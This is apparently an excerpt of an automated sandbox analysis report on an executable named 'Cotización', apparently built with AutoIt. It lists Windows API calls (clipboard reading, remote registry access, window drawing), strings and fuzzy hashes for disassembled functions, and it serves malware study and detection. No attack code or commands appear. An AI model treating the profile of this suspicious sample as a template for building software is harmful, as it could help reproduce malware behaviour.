                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Cursor$Load
                • String ID:
                • API String ID: 1675784387-0
                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                APIs
                • GetSysColor.USER32(0000000E), ref: 00430913
                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                • GetSysColor.USER32(00000012), ref: 00430933
                • SetTextColor.GDI32(?,?), ref: 0043093B
                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                • GetSysColor.USER32(0000000F), ref: 00430959
                • CreateSolidBrush.GDI32(?), ref: 00430962
                • GetSysColor.USER32(00000011), ref: 00430979
                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                • SelectObject.GDI32(?,00000000), ref: 0043099C
                • SetBkColor.GDI32(?,?), ref: 004309A6
                • SelectObject.GDI32(?,?), ref: 004309B4
                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                • DrawFocusRect.USER32(?,?), ref: 00430A91
                • GetSysColor.USER32(00000011), ref: 00430A9F
                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                • SelectObject.GDI32(?,?), ref: 00430AD0
                • DeleteObject.GDI32(00000105), ref: 00430ADC
                • SelectObject.GDI32(?,?), ref: 00430AE3
                • DeleteObject.GDI32(?), ref: 00430AE9
                • SetTextColor.GDI32(?,?), ref: 00430AF0
                • SetBkColor.GDI32(?,?), ref: 00430AFB
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                • String ID:
                • API String ID: 1582027408-0
                • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                APIs
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CloseConnectCreateRegistry
                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                • API String ID: 3217815495-966354055
                • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                APIs
                • GetCursorPos.USER32(?), ref: 004566AE
                • GetDesktopWindow.USER32 ref: 004566C3
                • GetWindowRect.USER32(00000000), ref: 004566CA
                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                • DestroyWindow.USER32(?), ref: 00456746
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                • IsWindowVisible.USER32(?), ref: 0045682C
                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                • GetWindowRect.USER32(?,?), ref: 00456873
                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                • CopyRect.USER32(?,?), ref: 004568BE
                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                • String ID: ($,$tooltips_class32
                • API String ID: 225202481-3320066284
                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                APIs
                • OpenClipboard.USER32(?), ref: 0046DCE7
                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                • CloseClipboard.USER32 ref: 0046DD0D
                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                • CloseClipboard.USER32 ref: 0046DD41
                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                • CloseClipboard.USER32 ref: 0046DD99
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                • String ID:
                • API String ID: 15083398-0
                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetWindowRect.USER32(?,?), ref: 00471CF7
                • GetClientRect.USER32(?,?), ref: 00471D05
                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                • GetClientRect.USER32(?,?), ref: 00471E8A
                • GetStockObject.GDI32(00000011), ref: 00471EA6
                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                • String ID: @$AutoIt v3 GUI
                • API String ID: 867697134-3359773793
                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1503153545-1459072770
                • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsicoll$__wcsnicmp
                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                • API String ID: 790654849-32604322
                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                APIs
                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                • _fseek.LIBCMT ref: 00452B3B
                • __wsplitpath.LIBCMT ref: 00452B9B
                • _wcscpy.LIBCMT ref: 00452BB0
                • _wcscat.LIBCMT ref: 00452BC5
                • __wsplitpath.LIBCMT ref: 00452BEF
                • _wcscat.LIBCMT ref: 00452C07
                • _wcscat.LIBCMT ref: 00452C1C
                • __fread_nolock.LIBCMT ref: 00452C53
                • __fread_nolock.LIBCMT ref: 00452C64
                • __fread_nolock.LIBCMT ref: 00452C83
                • __fread_nolock.LIBCMT ref: 00452C94
                • __fread_nolock.LIBCMT ref: 00452CB5
                • __fread_nolock.LIBCMT ref: 00452CC6
                • __fread_nolock.LIBCMT ref: 00452CD7
                • __fread_nolock.LIBCMT ref: 00452CE8
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                • __fread_nolock.LIBCMT ref: 00452D78
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                • String ID:
                • API String ID: 2054058615-0
                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window
                • String ID: 0
                • API String ID: 2353593579-4108050209
                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                APIs
                • GetSysColor.USER32(0000000F), ref: 0044A05E
                • GetClientRect.USER32(?,?), ref: 0044A0D1
                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                • GetWindowDC.USER32(?), ref: 0044A0F6
                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                • ReleaseDC.USER32(?,?), ref: 0044A11B
                • GetSysColor.USER32(0000000F), ref: 0044A131
                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                • GetSysColor.USER32(0000000F), ref: 0044A14F
                • GetSysColor.USER32(00000005), ref: 0044A15B
                • GetWindowDC.USER32(?), ref: 0044A1BE
                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                • GetSysColor.USER32(00000008), ref: 0044A265
                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                • GetStockObject.GDI32(00000005), ref: 0044A28A
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                • String ID:
                • API String ID: 1744303182-0
                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                • __mtterm.LIBCMT ref: 00417C34
                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                • __init_pointers.LIBCMT ref: 00417CE6
                • __calloc_crt.LIBCMT ref: 00417D54
                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 4163708885-3819984048
                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
